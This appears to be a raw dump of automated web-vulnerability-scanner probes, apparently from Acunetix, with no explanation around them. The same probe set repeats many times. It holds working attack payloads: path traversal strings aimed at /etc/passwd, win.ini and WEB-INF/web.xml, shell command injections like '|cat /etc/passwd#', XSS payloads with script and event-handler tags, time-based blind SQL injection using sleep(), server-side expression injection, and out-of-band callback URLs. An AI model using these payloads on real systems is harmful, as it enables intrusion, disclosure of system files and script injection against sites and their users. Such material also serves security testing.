..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

-1

1<img/src=">" onerror=alert(931389)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(976274)</sCripT>

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99046+100354}

1

1

1

|cat /etc/passwd#

1&lt

1

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

<img acu onmouseover=prompt(915878) //>

'|'ld

1&n986068=v970349

1some_inexistent_file_with_long_name%00.jpg

GO9V3AX1'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1<input autofocus onfocus=prompt(927514)>

"|"ld

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

KqYcbLi6')

.\./.\./.\./.\./.\./.\./etc/passwd

1

!(()&&!|*|*|

'"()

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

testasp.vulnweb.com

1FStOWUN'))

1

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

'

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1

1

1

"

1_JCLXF <ScRiPt >prompt(996430)</ScRiPt>

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1)

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hitQBy8AdCgbY.bxss.me/

................etc/passwd

1

acunetix_wvs_invalid_filename

-1))

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

comments

Gw8HMpgz'

1

1

'&dir&'

1

1

file:///etc/passwd

1

g3oAdI12')

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

"&dir&"

'"

1'"()&%<ScRiPt >prompt(975740)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

Jx54Nm1p'))

comments/.

1

|dir

1

'"()&%<ScRiPt >prompt(945816)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

'|dir

1_967883

WEB-INF\web.xml

1

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

acu5066<s1﹥s2ʺs3ʹuca5066

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acux8746z1z2abcxuca8746

1

1

1

1

1

1<ScRiPt >prompt(926410)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(992663)</script>

1

1

1

windowswin.ini

1

1

1<ScRiPt >prompt(971563)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?974253></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(992972)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(986890)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922033)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9502373*9495775)

1<div style=width:expression(prompt(904289))>

1

1

1

'+response.write(9502373*9495775)+'

1<iframe src='data:text/html

1

WEB-INF/web.xml

1

1

&cat /etc/passwd&

"+response.write(9502373*9495775)+"

1<body onload=prompt(996404)>

WEB-INF\web.xml

1

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(953182)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(976597)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(951600)>

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${100470+100417}

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(917025)</sCripT>

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&n949231=v974181

|cat /etc/passwd#

1

1

1some_inexistent_file_with_long_name%00.jpg

1&lt

)

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<img acu onmouseover=prompt(926414) //>

.\./.\./.\./.\./.\./.\./etc/passwd

!(()&&!|*|*|

xlBMDtMR'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

testasp.vulnweb.com

'"()

1<input autofocus onfocus=prompt(930722)>

3hV2tLqx')

/etc/passwd

^(#$!@#$)(()))******

1

'

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

nPcjp82u'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

"

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

http://hitxLnnkYheW2.bxss.me/

"

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1_hvLyF <ScRiPt >prompt(931409)</ScRiPt>

1

-1)

1

................etc/passwd

1

1

comments

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

http://www.acunetix.tst

sB69AhDI'

file:///etc/passwd

1

comments

'"

1

1

1

'&dir&'

1

RmYwpB0v')

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

1'"()&%<ScRiPt >prompt(920123)</ScRiPt>

1

"&dir&"

iEMYbSNA'))

1

WEB-INF/web.xml

<!--

'"()&%<ScRiPt >prompt(937503)</ScRiPt>

1

1

|dir

1

1

WEB-INF\web.xml

1

1_954528

1

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

1

acu4606<s1﹥s2ʺs3ʹuca4606

1

1

1

../../../../../../../../../../boot.ini

1

acux1402z1z2abcxuca1402

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(932548)</ScRiPt>

1

1

1

1<script>prompt(973492)</script>

windowswin.ini

1

1

1

................windowswin.ini

1<ScRiPt >prompt(942382)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945869></ScRiPt>

1

1

1

1<ScRiPt >prompt(989440)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(960258)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910837)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<div style=width:expression(prompt(908038))>

response.write(9663966*9153022)

1

1

'+response.write(9663966*9153022)+'

1<iframe src='data:text/html

WEB-INF/web.xml

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

"+response.write(9663966*9153022)+"

1<body onload=prompt(994225)>

1

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996764)>

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(965540)>

1

-1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

1

1

1<img/src=">" onerror=alert(940557)>

${100426+99977}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

1

1

1<ScRiPt%20>prompt(936477)</sCripT>

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

1

0AVYQS9n'

1&lt

1

1&n966897=v936684

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

1

1

kzT2HwyG')

<img acu onmouseover=prompt(965670) //>

testasp.vulnweb.com

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

"|"ld

1

9F5wsaoo'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(924336)>

'"()

1

/etc/passwd

1

'

-1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

"

1

-1)

1

1

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

acunetix_wvs_invalid_filename

-1))

1

http://hitpsiWQsnoMt.bxss.me/

1_HWAfr <ScRiPt >prompt(978994)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

................etc/passwd

||cat /etc/passwd

1

comments

bm0mcZKe'

1

1

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

1

file:///etc/passwd

C10Ak6s1')

1

1

http://www.acunetix.tst

1

comments/.

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

wqbah2tT'))

'"

1

1'"()&%<ScRiPt >prompt(960948)</ScRiPt>

1

1

|dir

1

<!--

WEB-INF/web.xml

1

1

1

1

'|dir

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(992951)</ScRiPt>

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1_946583

1

1

1

1

../../../../../../../../../../boot.ini

acu8473<s1﹥s2ʺs3ʹuca8473

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux1984z1z2abcxuca1984

1

1

1

windowswin.ini

1<ScRiPt >prompt(979971)</ScRiPt>

1

1

1

................windowswin.ini

1

1<script>prompt(992012)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(972071)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975460></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(925395)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(994501)">

1

response.write(9600263*9403602)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905810)"></g></svg>

1

WEB-INF/web.xml

&cat /etc/passwd&

'+response.write(9600263*9403602)+'

1

1

1<div style=width:expression(prompt(909612))>

1

WEB-INF\web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

"+response.write(9600263*9403602)+"

1

1<iframe src='data:text/html

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(965805)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929029)>

1

-1

${99325+99950}

`cat /etc/passwd`

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(984369)>

1

-1)

1

|cat /etc/passwd#

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1<img/src=">" onerror=alert(993143)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n907728=v940390

1

'|'ld

)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(952448)</sCripT>

f4yuRraC'

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

1

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

c0xUllmO')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1

/etc/passwd

'"()

<img acu onmouseover=prompt(935688) //>

'

testasp.vulnweb.com

pPolulle'))

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(973727)>

"

1

1

-1

1

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

-1)

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

http://hit7Y61wv4T47.bxss.me/

1

................etc/passwd

comments

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

1_Ylg3N <ScRiPt >prompt(913506)</ScRiPt>

1

1

is7HpywJ'

comments

file:///etc/passwd

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

1

8M7LJpA9')

'"

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

"&dir&"

1

1

1

1

IlzdDYc2'))

1

<!--

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(903761)</ScRiPt>

|dir

1

1

1

1

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(980923)</ScRiPt>

'|dir

1

1

1

1

1

1_900954

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

1

1

../../../../../../../../../../boot.ini

1

acu3499<s1﹥s2ʺs3ʹuca3499

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6950z1z2abcxuca6950

1

1

windowswin.ini

1

1

1<ScRiPt >prompt(953455)</ScRiPt>

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(977984)</script>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(953116)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?971812></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(990295)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(962921)">

1

1

WEB-INF/web.xml

1

1

response.write(9572296*9598400)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983521)"></g></svg>

WEB-INF\web.xml

1

1

1

1

'+response.write(9572296*9598400)+'

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<div style=width:expression(prompt(958877))>

../../../../../../../../../../etc/passwd

1

"+response.write(9572296*9598400)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<iframe src='data:text/html

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<body onload=prompt(918586)>

1

"&cat /etc/passwd&"

1

1

${99982+99061}

../../../../../../../../../../etc/passwd.jpg

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932879)>

1

cat /etc/passwd

1

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(956932)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

`cat /etc/passwd`

1

1&n999672=v997892

-1))

1<img/src=">" onerror=alert(963391)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

)

1

1

|cat /etc/passwd#

1

1<ScRiPt%20>prompt(937762)</sCripT>

FlbL2suP'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'|'ld

m8odiv65')

'"()

1&lt

1

^(#$!@#$)(()))******

.\./.\./.\./.\./.\./.\./etc/passwd

testasp.vulnweb.com

1

GNqMjvx1'))

1

'

"|"ld

<img acu onmouseover=prompt(988715) //>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

1

1

-1

"

1<input autofocus onfocus=prompt(949038)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

'

http://hitiPBhsZT4nZ.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

acunetix_wvs_invalid_filename

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

"

1

1

................etc/passwd

1

1

comments

oRqQFiRi'

1

||cat /etc/passwd

1_TSIu9 <ScRiPt >prompt(939849)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

6iIcn9bl')

comments

1

'"

file:///etc/passwd

&dir

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(921446)</ScRiPt>

dUyywl2l'))

comments/.

<!--

'&dir&'

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(921159)</ScRiPt>

TERUPXji'))

1

1

"&dir&"

1

1_953422

1

WEB-INF\web.xml

1

1

1

1

|dir

acu9557<s1﹥s2ʺs3ʹuca9557

../../../../../../../../../../windows/win.ini

1

1

1

1

'|dir

../../../../../../../../../../boot.ini

acux5357z1z2abcxuca5357

1

1

"|dir

1

1<ScRiPt >prompt(968896)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<script>prompt(936093)</script>

1

windowswin.ini

1

1

1<ScRiPt >prompt(918226)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?911842></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(924825)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(977852)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(986712)"></g></svg>

1

1

1

1<div style=width:expression(prompt(922355))>

response.write(9266957*9002796)

1

WEB-INF/web.xml

1

1<iframe src='data:text/html

1

1

'+response.write(9266957*9002796)+'

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(935016)>

&cat /etc/passwd&

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"+response.write(9266957*9002796)+"

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959072)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(914916)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

-1

1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(933444)>

1

cat /etc/passwd

${100347+100073}

1

1

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(948269)</sCripT>

1

`cat /etc/passwd`

1

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1&n913448=v935488

1&lt

1

1

1

yiq13qzf'

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

'|'ld

1

<img acu onmouseover=prompt(965042) //>

1

1

njqrLbAd')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

!(()&&!|*|*|

"|"ld

1<input autofocus onfocus=prompt(995612)>

1

1

h2Yg6Wor'))

testasp.vulnweb.com

1

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

1

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

"

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_cd640 <ScRiPt >prompt(935403)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

"

1

1

-1))

1

1

acunetix_wvs_invalid_filename

................etc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

http://hitOW9IRGXZVj.bxss.me/

1

kle4ctsH'

1

comments

1

1

&dir

1

1

H4dri37L')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

file:///etc/passwd

'&dir&'

1

http://www.acunetix.tst

zU4yB3HJ'))

1

1

'"

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1'"()&%<ScRiPt >prompt(956935)</ScRiPt>

1

1

1

<!--

1

WEB-INF/web.xml

|dir

'"()&%<ScRiPt >prompt(959799)</ScRiPt>

1

1

1

1

1

1

1

WEB-INF\web.xml

'|dir

1_953844

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu1157<s1﹥s2ʺs3ʹuca1157

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acux8583z1z2abcxuca8583

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(980453)</ScRiPt>

windowswin.ini

1

1

1

................windowswin.ini

1<script>prompt(937101)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(981563)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986611></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(969211)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9124442*9470198)

1

1

1<video><source onerror="javascript:prompt(923439)">

1

1

WEB-INF/web.xml

'+response.write(9124442*9470198)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(956265)"></g></svg>

"+response.write(9124442*9470198)+"

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

1<div style=width:expression(prompt(976827))>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(938086)>

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(923529)>

${100019+99243}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1

1

1<img src=xyz OnErRor=prompt(930845)>

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n920733=v992140

-1))

1

1<img/src=">" onerror=alert(900642)>

)

PWyuCv4L'

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1<ScRiPt%20>prompt(980678)</sCripT>

!(()&&!|*|*|

cs3UbMfB')

'"()

"|"ld

testasp.vulnweb.com

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1&lt

^(#$!@#$)(()))******

1

nC2QLMwi'))

1

1

1

/etc/passwd

'

1

<img acu onmouseover=prompt(915752) //>

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1<input autofocus onfocus=prompt(946613)>

1

-1)

1

"

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

-1))

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

http://hitsz1nNxUBFX.bxss.me/

QYANWB8j'

${@print(md5(acunetix_wvs_security_test))}\

................etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

comments

1

&dir

1

R2fr6xsV')

1

1

1_EhnWj <ScRiPt >prompt(951687)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

file:///etc/passwd

http://www.acunetix.tst

IbxxtALt'))

'"

1

1

1

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1

<!--

1

1

1'"()&%<ScRiPt >prompt(995352)</ScRiPt>

|dir

1

1

WEB-INF/web.xml

1

1

1

1

'"()&%<ScRiPt >prompt(969285)</ScRiPt>

WEB-INF\web.xml

'|dir

1

1

1

1

"|dir

1_979989

../../../../../../../../../../windows/win.ini

1

1

1

acu9559<s1﹥s2ʺs3ʹuca9559

1

../../../../../../../../../../boot.ini

1

1

acux7497z1z2abcxuca7497

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

windowswin.ini

1<ScRiPt >prompt(974984)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(939917)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(927242)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?989840></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(959062)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(989535)">

1

1

WEB-INF/web.xml

